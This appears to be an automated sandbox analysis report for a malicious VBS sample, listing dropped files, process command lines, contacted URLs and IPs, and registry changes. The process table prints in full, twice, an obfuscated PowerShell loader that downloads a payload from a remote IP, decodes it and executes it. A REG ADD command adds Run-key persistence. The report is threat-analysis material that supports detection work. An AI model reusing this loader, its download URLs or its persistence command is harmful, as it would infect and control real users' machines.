Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
01105751.vbs
|
ASCII text, with very long lines (604), with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
|
Microsoft Cabinet archive data, Windows 2000/XP setup, 69993 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks,
0x1 compression
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\-507JlJ26-
|
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie
0x37, schema 4, UTF-8, version-valid-for 8
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b4c0somd.z5j.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l1g2jvys.sae.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pfnknd33.sdq.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pvscwo21.fkk.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Sagsgningerne.Int
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\01105751.vbs"
|
|
|
|
C:\Windows\System32\PING.EXE
|
ping google.com -n 1
|
|
|
|
C:\Windows\System32\PING.EXE
|
ping %.%.%.%
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c dir
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Retorsionshandlingenllustrationer = 1;$Elytrigerous='S';$Elytrigerous+='ubstrin';$Elytrigerous+='g';Function
Programregningsfunktionens($Ridderne){$Retorsionshandlingennfraocular=$Ridderne.Length-$Retorsionshandlingenllustrationer;For($Retorsionshandlingen=5;
$Retorsionshandlingen -lt $Retorsionshandlingennfraocular; $Retorsionshandlingen+=(6)){$Outsmokes+=$Ridderne.$Elytrigerous.Invoke(
$Retorsionshandlingen, $Retorsionshandlingenllustrationer);}$Outsmokes;}function Gracy216($Begrendes){. ($Antediluvianske)
($Begrendes);}$Diskoskasteren=Programregningsfunktionens 's.perM L deoLandszAccomiTurbolBrystlSu.loa Inte/Linje5.ilfo.Brneb0B,ddi
illi(MamelWKortsiExoranBowkndSp,dho.urvew,ndtrsFjase utotNmilepTb,een marga1San.u0Balli.Montr0H,rsk;.ykke BrakpWxanthi ,ervnReprs6trova4Filet;D,awc
vidnxT,gue6Admin4Cotra;Insci Un btrTogstvEgipt:Inter1Riv l2For e1 daun. Gens0Sknde)Neutr Trak GRepudeGuldkc BelakTandloV.rde/
edb2Uheld0Sknhe1Elek.0Nell,0 ,rot1Un,en0Skibi1savne MordFautogiKo,merDe,inearom,fShipboHapaxxStork/Inten1Splas2Ds,es1 ilsk.Fylds0Capri
';$Sprayens=Programregningsfunktionens 'NondeU rubasVa neeBe,kir For -,geblAR.bbegholose Ta dn ParatPrivi ';$Reprogrammes=Programregningsfunktionens
'Stuf.hL.muctVersit SubspCosmo:etcif/Taksa/ Impl8Morph7Far,n.Bronz1Anal,2proc,1Ungl .unpol1Unper0F,nda5varmt. Gr,n5Roc,e4,sent/SeksaOOverrmMismamT.buleLandlsForcetmis,arAtropuDiscop,iske.AarsadUnsanesaanipBrodflDiameonamatySawai
';$Kretidseffekternes=Programregningsfunktionens 'Vejkr>Phisa ';$Antediluvianske=Programregningsfunktionens 'Etam.iRaadie
saddxFasts ';$Gunlaying='Forraadnelig';Gracy216 (Programregningsfunktionens ' L urS AtikeSignatRecon- geneCPen,eo.endrnNovumtPrintelailanPorphtSt
ir Peatw-AngloPObitaa elvetSymbohP,esh TrvemT,ough: ,aad\ Afv I Cerid.roldrCheskt UdpasFilerfMenneo C,lorsol,ceSuavenphaneiIndlenAabengSeepssUnche1Pre
i9Wi,db7Super.RadiotNiveax t rrt Duod Evole-Un mmV selraMoraklPericuUnmoueAdvoc Melle$samstG estiu AppenRe,orl TeleaAnmrkySaponiImmunn
BehvgAh.eh;Chabo ');Gracy216 (Programregningsfunktionens ' FramiHabi,fCacos larit( GrectV.stfe.olfisTalertRidge-OzonopJu iaaStoddtTabarhPigl,
Pse THaand:Mosen\KomplI .oemd ilker tigetEperosKrig,f ColloPl.udr SubseMad lnNonmoiKromgnEnok g SaxosHaand1 Twir9Op oe7 Lov..Fedtst
An txfarvet Rede) rtss{ Ka.me KropxFaksiiUdsket Sang} Un s; Gro, ');$Kvrne = Programregningsfunktionens 'NedraeUnconcUan.ghPet
ooPaatn Munke%Kys.eaCasanpfy,depSixpedOver aGravit orema Ragl%Euboe\DevelS LovgaLaa,ngPlat sNematgBug.gn JalaiTegninOvercgArbe.eSl,knr
Forsn p.ileafsvo. UnshISpirinM lartH ved .fsla&Neonr&Be.ri AdiabeTro ecUdganhSvovloeksp Trink$Ambol ';Gracy216 (Programregningsfunktionens
'Slide$SvmnigImperlAvn,soT aadb Rag,aPie alFordr: DemiVGoogoiQuittrShop k TrknsMycetofodbomHomemhDr sieEffemd De,isdawsst
Bf eyOprikpBrancePatrunSongbs Thri=Nonam(Am.utcPillamSulted Stev Toksi/ ilhecRajah bed $.inguK lirevYderzrEutopnExaucehep.a)Kinkl
');Gracy216 (Programregningsfunktionens ' G ni$Hot ogBoffilBotchoOcto bD gsoapetull Akse:ReillJAlkalaPointd Nigre Wien=Alv
o$micr RSkribeLute,p DestrMnsteoConfegSemisrKul,uaShephmVokstm Du,teFdevassten.. E.ilsIconopCarpelMediaiCalvat Sol ( ylds$DemenKFur
arPrecieWhoretFladliBlownd Enkesifr,eeErnrif Re.af Cooke Anenk RaadtOu.fle Aft.rInclunO erfeFor,lsTimal)Morsk ');$Reprogrammes=$Jade[0];Gracy216
(Programregningsfunktionens 'P ovo$ orong.lyngl d.bkoModelbG uetaRe.islSmaad:DarviOSe vbpoverbb .delaParask raman preti ModsnDelirgSk
teeIsomorSpildnPanoce Hec,sBogst= MakvNM.rphe Therw.unda- LakfO ndebG,verjAcquae Aca cFakket Paah B,vidSTransyGaards U.vitGigole
Bes.m Til,.BarreNill meHrevitpl ni. ,ddiW Fyrie S,ilb KodeCDecerl,krmiiKenyoeElseknReinttKaryo ');Gracy216 (Programregningsfunktionens
' Opkr$ anicO Am tpmanifbAeriaaDragokSom knlag,piCowbon TestgBve reDialerTapetn Occ.e Acc,sLysim.BegruHSensaeSola,aeddo.dMidene,esbirSkrivszuric[Unbat$DyrskSPrivipAgglorBrdskaBondeySkrlleChromnJabotsDysc,]Afse.=Clino$PerisD
CeptiSpants NummkCarpooAstros,harnkThoseaCzardsYement ,reteTauterVirileFotognSlang ');$unrestitutive=Programregningsfunktionens
'unquiO.etshpKardub enfoaUns.rkKh.lin.undaiSdeign Af.kgStikkeforfarPhilinSchooeMastes fjer.CubanDI dusoA,sluw MissnBonifltal,uo
Spira Irrad ndriF .yrsi my,glSta.leCon.i(Immun$SkadeRSi.use SulppUnhilrExcuso .uargQuislrGaaseaSmid m FollmBeefiebod gs ,one,Unchl$sk
ifBSamitaSmaabgHaveeaGotergimpeteWolfyrDebat) Dext ';$unrestitutive=$Virksomhedstypens[1]+$unrestitutive;$Bagager=$Virksomhedstypens[0];Gracy216
(Programregningsfunktionens 'Bruge$KabelgCrackl BankoAntikbSystea kovsl ehf:Wit iC i,dhhFunktaCo.dyrMatripNonreiChapt= Hasl(DobbeTGenv.eAntidsVognpt
u pa-Fyr.ePChiboadiplotFogethPense svog$FeltrBGranoaUndergS alta EjurgLact ePiar rBlaas) Bonb ');while (!$Charpi) {Gracy216
(Programregningsfunktionens '.ekor$attragLitholPerinoOverab S riaMaelsl Eass:Xe opkTrapplOve.ci HousgPlatyeFiffischl.r=buest$,oldft
ersirKonsuuDyr,eeHoved ') ;Gracy216 $unrestitutive;Gracy216 (Programregningsfunktionens 'DrakoSCustutAli,aaAmo.nrS.ltitDoser-B.criSSocialhear
e JosteKalciplynce Minds4 tra, ');Gracy216 (Programregningsfunktionens 'Moiti$HentrgHomeslAttrioTylerbTocylaDesp.l Ri s:Hoo
aC epash,rdnua NicorHemsepDeerfi,esbe=Pseud(,crieTFiordeBebl s Rub t F.va-SnaffPsq,ataS,aahtWizenhProgr Udste$XylidBTilstaKommugTypegaEp
togLykkee ypoar Bevg)Niels ') ;Gracy216 (Programregningsfunktionens 'Amidu$ I dlgFlgesl Bilfo Barrb Afa a Ca,slapote:Vi erTIma.erHeadseAfskynEuxans
Imp.eKobsjs nfer=T wmo$ NitrgG raflNewyooAtwixbIrredaCarpelPresb:TipskC,ynkeiEndesr FurlcHandeuSu,erm FlegzBlikkeGl,conMotiviBogs.t
PoethCleara TriulLo,di+be.ka+Gymno%Trans$.crumJShawyaklostdUdlaae Quin.NonhecUn roo Ink,uNo phn com,t ewr ') ;$Reprogrammes=$Jade[$Trenses];}Gracy216
(Programregningsfunktionens 'Riban$IncongCheepl ar.eo Sperbglucoas,lenlRubin:Snvr.F GererFil,ue Salld Semis Showb Kalce S,bdv
Holda SubseMaleagFl veeUnivelFactisYahgaeJ.wle1Negli3Incul3Besti m,dm= Fitm FecktG pfyleBepaitOctof- Fr mCgaranochartnKrad
tPrioreU.ympnBestetRe.ns Hj or$ N geBRegnsaBromcg.ermsaPasipgSou.we ntrrMes e ');Gracy216 (Programregningsfunktionens 'Hjert$watergAabnelPro.iounre,b
VoksaAutomlCoisl: RyddIAl,ctn MarkcSeptioRemonaHebdolB eeke AinusVeksecVictieHerm nTeachc ExteeFine Nicht=Jus,l Avoca[ ,issSKenosy
Haw sKakoftN.nhee Und,m asr. AltaCFejlboMidfinSide,vToldbeA oebrBeboetEumen]Dngbr:Taarn:RecepFSava.rSkingoBillim RemuBSiliqa
fremsSparee obsc6Under4N theSSee,st ,ndsrTyp.oiHjmesn AfkagSk iv(,prrs$N ettFKolonrRetoueglottdRecalsUnt.mb Dadaekeratv Sovea
False ungbgSor.aeSpaaklM.sdesCetaneTunne1defig3cep.a3Bredd)sloww ');Gracy216 (Programregningsfunktionens 'Ances$CellugTnkeelCaesioArvesb
MetraRumswl igan: romaPunproe ,ekulGl,sasPiruedT.rreyLejlarCeremf GelaaT.rifrHugonmIndag Preki=vendi D.ase[NeddyScoffeySmudgsMu,kitGemineb
belmDyppe. HresT S,ipeChowdxapolltMlkes.KontrE ,rdin O,occ Ind oRest,dLoomiiBortfnKedelgIncul]Natur:Hoved:StracAPrjudS.archC
pantI PhenI N.nf.GelatGUdskre ,ildt Arm.SCommetInvadr Messi,ooksnDj,elgudham(Uroks$RunouIMedicnSau ecNonproUdvisaFrih lFortreKalots
Volcc KlkkesticknParenc Vmi e,osta)Therm ');Gracy216 (Programregningsfunktionens 'Reac $ FadegMaximlEkskloHorosb ,onnaSyst,lReces:
SmreSMcmahiTragtlHeadsdAnkeseBa.etfBytt,i Serts orfrkExtboeMisadrnulpunHjtidedatol=R str$XiphiPS,atieNonprlEstersSa,frd akneyKatarr
mesef UnstastyrerreblomBesla.huff.sCubituVictib,indes nlegtOr anrKnippiShallnTink.g s.ld( Navn3Nonsy1Pride9 Pref8Hotel5Dialo3
,ilb,Neis 2 Brev8Un,ro4Flaad1Svens7,reex)Terro ');Gracy216 $Sildefiskerne;"
|
|
|
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Sagsgningerne.Int && echo $"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Retorsionshandlingenllustrationer = 1;$Elytrigerous='S';$Elytrigerous+='ubstrin';$Elytrigerous+='g';Function
Programregningsfunktionens($Ridderne){$Retorsionshandlingennfraocular=$Ridderne.Length-$Retorsionshandlingenllustrationer;For($Retorsionshandlingen=5;
$Retorsionshandlingen -lt $Retorsionshandlingennfraocular; $Retorsionshandlingen+=(6)){$Outsmokes+=$Ridderne.$Elytrigerous.Invoke(
$Retorsionshandlingen, $Retorsionshandlingenllustrationer);}$Outsmokes;}function Gracy216($Begrendes){. ($Antediluvianske)
($Begrendes);}$Diskoskasteren=Programregningsfunktionens 's.perM L deoLandszAccomiTurbolBrystlSu.loa Inte/Linje5.ilfo.Brneb0B,ddi
illi(MamelWKortsiExoranBowkndSp,dho.urvew,ndtrsFjase utotNmilepTb,een marga1San.u0Balli.Montr0H,rsk;.ykke BrakpWxanthi ,ervnReprs6trova4Filet;D,awc
vidnxT,gue6Admin4Cotra;Insci Un btrTogstvEgipt:Inter1Riv l2For e1 daun. Gens0Sknde)Neutr Trak GRepudeGuldkc BelakTandloV.rde/
edb2Uheld0Sknhe1Elek.0Nell,0 ,rot1Un,en0Skibi1savne MordFautogiKo,merDe,inearom,fShipboHapaxxStork/Inten1Splas2Ds,es1 ilsk.Fylds0Capri
';$Sprayens=Programregningsfunktionens 'NondeU rubasVa neeBe,kir For -,geblAR.bbegholose Ta dn ParatPrivi ';$Reprogrammes=Programregningsfunktionens
'Stuf.hL.muctVersit SubspCosmo:etcif/Taksa/ Impl8Morph7Far,n.Bronz1Anal,2proc,1Ungl .unpol1Unper0F,nda5varmt. Gr,n5Roc,e4,sent/SeksaOOverrmMismamT.buleLandlsForcetmis,arAtropuDiscop,iske.AarsadUnsanesaanipBrodflDiameonamatySawai
';$Kretidseffekternes=Programregningsfunktionens 'Vejkr>Phisa ';$Antediluvianske=Programregningsfunktionens 'Etam.iRaadie
saddxFasts ';$Gunlaying='Forraadnelig';Gracy216 (Programregningsfunktionens ' L urS AtikeSignatRecon- geneCPen,eo.endrnNovumtPrintelailanPorphtSt
ir Peatw-AngloPObitaa elvetSymbohP,esh TrvemT,ough: ,aad\ Afv I Cerid.roldrCheskt UdpasFilerfMenneo C,lorsol,ceSuavenphaneiIndlenAabengSeepssUnche1Pre
i9Wi,db7Super.RadiotNiveax t rrt Duod Evole-Un mmV selraMoraklPericuUnmoueAdvoc Melle$samstG estiu AppenRe,orl TeleaAnmrkySaponiImmunn
BehvgAh.eh;Chabo ');Gracy216 (Programregningsfunktionens ' FramiHabi,fCacos larit( GrectV.stfe.olfisTalertRidge-OzonopJu iaaStoddtTabarhPigl,
Pse THaand:Mosen\KomplI .oemd ilker tigetEperosKrig,f ColloPl.udr SubseMad lnNonmoiKromgnEnok g SaxosHaand1 Twir9Op oe7 Lov..Fedtst
An txfarvet Rede) rtss{ Ka.me KropxFaksiiUdsket Sang} Un s; Gro, ');$Kvrne = Programregningsfunktionens 'NedraeUnconcUan.ghPet
ooPaatn Munke%Kys.eaCasanpfy,depSixpedOver aGravit orema Ragl%Euboe\DevelS LovgaLaa,ngPlat sNematgBug.gn JalaiTegninOvercgArbe.eSl,knr
Forsn p.ileafsvo. UnshISpirinM lartH ved .fsla&Neonr&Be.ri AdiabeTro ecUdganhSvovloeksp Trink$Ambol ';Gracy216 (Programregningsfunktionens
'Slide$SvmnigImperlAvn,soT aadb Rag,aPie alFordr: DemiVGoogoiQuittrShop k TrknsMycetofodbomHomemhDr sieEffemd De,isdawsst
Bf eyOprikpBrancePatrunSongbs Thri=Nonam(Am.utcPillamSulted Stev Toksi/ ilhecRajah bed $.inguK lirevYderzrEutopnExaucehep.a)Kinkl
');Gracy216 (Programregningsfunktionens ' G ni$Hot ogBoffilBotchoOcto bD gsoapetull Akse:ReillJAlkalaPointd Nigre Wien=Alv
o$micr RSkribeLute,p DestrMnsteoConfegSemisrKul,uaShephmVokstm Du,teFdevassten.. E.ilsIconopCarpelMediaiCalvat Sol ( ylds$DemenKFur
arPrecieWhoretFladliBlownd Enkesifr,eeErnrif Re.af Cooke Anenk RaadtOu.fle Aft.rInclunO erfeFor,lsTimal)Morsk ');$Reprogrammes=$Jade[0];Gracy216
(Programregningsfunktionens 'P ovo$ orong.lyngl d.bkoModelbG uetaRe.islSmaad:DarviOSe vbpoverbb .delaParask raman preti ModsnDelirgSk
teeIsomorSpildnPanoce Hec,sBogst= MakvNM.rphe Therw.unda- LakfO ndebG,verjAcquae Aca cFakket Paah B,vidSTransyGaards U.vitGigole
Bes.m Til,.BarreNill meHrevitpl ni. ,ddiW Fyrie S,ilb KodeCDecerl,krmiiKenyoeElseknReinttKaryo ');Gracy216 (Programregningsfunktionens
' Opkr$ anicO Am tpmanifbAeriaaDragokSom knlag,piCowbon TestgBve reDialerTapetn Occ.e Acc,sLysim.BegruHSensaeSola,aeddo.dMidene,esbirSkrivszuric[Unbat$DyrskSPrivipAgglorBrdskaBondeySkrlleChromnJabotsDysc,]Afse.=Clino$PerisD
CeptiSpants NummkCarpooAstros,harnkThoseaCzardsYement ,reteTauterVirileFotognSlang ');$unrestitutive=Programregningsfunktionens
'unquiO.etshpKardub enfoaUns.rkKh.lin.undaiSdeign Af.kgStikkeforfarPhilinSchooeMastes fjer.CubanDI dusoA,sluw MissnBonifltal,uo
Spira Irrad ndriF .yrsi my,glSta.leCon.i(Immun$SkadeRSi.use SulppUnhilrExcuso .uargQuislrGaaseaSmid m FollmBeefiebod gs ,one,Unchl$sk
ifBSamitaSmaabgHaveeaGotergimpeteWolfyrDebat) Dext ';$unrestitutive=$Virksomhedstypens[1]+$unrestitutive;$Bagager=$Virksomhedstypens[0];Gracy216
(Programregningsfunktionens 'Bruge$KabelgCrackl BankoAntikbSystea kovsl ehf:Wit iC i,dhhFunktaCo.dyrMatripNonreiChapt= Hasl(DobbeTGenv.eAntidsVognpt
u pa-Fyr.ePChiboadiplotFogethPense svog$FeltrBGranoaUndergS alta EjurgLact ePiar rBlaas) Bonb ');while (!$Charpi) {Gracy216
(Programregningsfunktionens '.ekor$attragLitholPerinoOverab S riaMaelsl Eass:Xe opkTrapplOve.ci HousgPlatyeFiffischl.r=buest$,oldft
ersirKonsuuDyr,eeHoved ') ;Gracy216 $unrestitutive;Gracy216 (Programregningsfunktionens 'DrakoSCustutAli,aaAmo.nrS.ltitDoser-B.criSSocialhear
e JosteKalciplynce Minds4 tra, ');Gracy216 (Programregningsfunktionens 'Moiti$HentrgHomeslAttrioTylerbTocylaDesp.l Ri s:Hoo
aC epash,rdnua NicorHemsepDeerfi,esbe=Pseud(,crieTFiordeBebl s Rub t F.va-SnaffPsq,ataS,aahtWizenhProgr Udste$XylidBTilstaKommugTypegaEp
togLykkee ypoar Bevg)Niels ') ;Gracy216 (Programregningsfunktionens 'Amidu$ I dlgFlgesl Bilfo Barrb Afa a Ca,slapote:Vi erTIma.erHeadseAfskynEuxans
Imp.eKobsjs nfer=T wmo$ NitrgG raflNewyooAtwixbIrredaCarpelPresb:TipskC,ynkeiEndesr FurlcHandeuSu,erm FlegzBlikkeGl,conMotiviBogs.t
PoethCleara TriulLo,di+be.ka+Gymno%Trans$.crumJShawyaklostdUdlaae Quin.NonhecUn roo Ink,uNo phn com,t ewr ') ;$Reprogrammes=$Jade[$Trenses];}Gracy216
(Programregningsfunktionens 'Riban$IncongCheepl ar.eo Sperbglucoas,lenlRubin:Snvr.F GererFil,ue Salld Semis Showb Kalce S,bdv
Holda SubseMaleagFl veeUnivelFactisYahgaeJ.wle1Negli3Incul3Besti m,dm= Fitm FecktG pfyleBepaitOctof- Fr mCgaranochartnKrad
tPrioreU.ympnBestetRe.ns Hj or$ N geBRegnsaBromcg.ermsaPasipgSou.we ntrrMes e ');Gracy216 (Programregningsfunktionens 'Hjert$watergAabnelPro.iounre,b
VoksaAutomlCoisl: RyddIAl,ctn MarkcSeptioRemonaHebdolB eeke AinusVeksecVictieHerm nTeachc ExteeFine Nicht=Jus,l Avoca[ ,issSKenosy
Haw sKakoftN.nhee Und,m asr. AltaCFejlboMidfinSide,vToldbeA oebrBeboetEumen]Dngbr:Taarn:RecepFSava.rSkingoBillim RemuBSiliqa
fremsSparee obsc6Under4N theSSee,st ,ndsrTyp.oiHjmesn AfkagSk iv(,prrs$N ettFKolonrRetoueglottdRecalsUnt.mb Dadaekeratv Sovea
False ungbgSor.aeSpaaklM.sdesCetaneTunne1defig3cep.a3Bredd)sloww ');Gracy216 (Programregningsfunktionens 'Ances$CellugTnkeelCaesioArvesb
MetraRumswl igan: romaPunproe ,ekulGl,sasPiruedT.rreyLejlarCeremf GelaaT.rifrHugonmIndag Preki=vendi D.ase[NeddyScoffeySmudgsMu,kitGemineb
belmDyppe. HresT S,ipeChowdxapolltMlkes.KontrE ,rdin O,occ Ind oRest,dLoomiiBortfnKedelgIncul]Natur:Hoved:StracAPrjudS.archC
pantI PhenI N.nf.GelatGUdskre ,ildt Arm.SCommetInvadr Messi,ooksnDj,elgudham(Uroks$RunouIMedicnSau ecNonproUdvisaFrih lFortreKalots
Volcc KlkkesticknParenc Vmi e,osta)Therm ');Gracy216 (Programregningsfunktionens 'Reac $ FadegMaximlEkskloHorosb ,onnaSyst,lReces:
SmreSMcmahiTragtlHeadsdAnkeseBa.etfBytt,i Serts orfrkExtboeMisadrnulpunHjtidedatol=R str$XiphiPS,atieNonprlEstersSa,frd akneyKatarr
mesef UnstastyrerreblomBesla.huff.sCubituVictib,indes nlegtOr anrKnippiShallnTink.g s.ld( Navn3Nonsy1Pride9 Pref8Hotel5Dialo3
,ilb,Neis 2 Brev8Un,ro4Flaad1Svens7,reex)Terro ');Gracy216 $Sildefiskerne;"
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Sagsgningerne.Int && echo $"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Achaque" /t REG_EXPAND_SZ
/d "%Akkvisitiv% -w 1 $Europiums=(Get-ItemProperty -Path 'HKCU:\Respirometres\').Xenoplastic;%Akkvisitiv% ($Europiums)"
|
|
|
|
C:\Windows\SysWOW64\reg.exe
|
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Achaque" /t REG_EXPAND_SZ /d "%Akkvisitiv% -w 1 $Europiums=(Get-ItemProperty
-Path 'HKCU:\Respirometres\').Xenoplastic;%Akkvisitiv% ($Europiums)"
|
|
|
|
C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe
|
"C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe"
|
|
|
|
C:\Windows\SysWOW64\xcopy.exe
|
"C:\Windows\SysWOW64\xcopy.exe"
|
|
|
|
C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe
|
"C:\Program Files (x86)\wgDrSTbxuDuJLxUFixRFuyhAkBSOdBneRpJXCfVkaeok\TsrCaEwNrfOKANGWcsg.exe"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
|
|
|
C:\Program Files\Mozilla Firefox\firefox.exe
|
"C:\Program Files\Mozilla Firefox\Firefox.exe"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\rundll32.exe
|
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6}
-Embedding
|
There are 13 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
|
|
|
http://www.facesofhoustontx.com/gnto/?P2v=kzXtiRyPGhR4rzp&4v8xJ8=F2aKH/UhYyQy5bhtG47arqZTAzYBZHKo8pZvH2jiqbKPAiUNCKzfvPloMCIQjvvo+O//vWhBzU38U00+OJnukLQGsUBXCgymNTKCViCR5sTiLbhUlqXxexqjYjSB6xlfqI4lO2I=
|
34.174.122.2
|
|
|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://87.121.105.54
|
unknown
|
||
|
http://87.121.105.54/iYbZIhIVLPBjJUzImyrJN72.bin
|
87.121.105.54
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
http://87.121.105.54/Ommestrup.deploy
|
87.121.105.54
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://87.121.H
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
http://87.121.105.54/Ommestrup.deployP
|
unknown
|
There are 7 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
www.facesofhoustontx.com
|
34.174.122.2
|
|
|
|
timesrenewables.com
|
3.33.130.190
|
|
|
|
bg.microsoft.map.fastly.net
|
199.232.214.172
|
||
|
google.com
|
142.251.40.206
|
||
|
www.timesrenewables.com
|
unknown
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
34.174.122.2
|
www.facesofhoustontx.com
|
United States
|
|
|
|
142.251.40.206
|
google.com
|
United States
|
||
|
87.121.105.54
|
unknown
|
Bulgaria
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
Achaque
|
|
|
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
VLGXKP5HJL
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER\Respirometres
|
Xenoplastic
|
||
|
HKEY_CURRENT_USER\Environment
|
Akkvisitiv
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
LangID
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\Explorer.exe.FriendlyAppName
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\Explorer.exe.ApplicationCompany
|
||
|
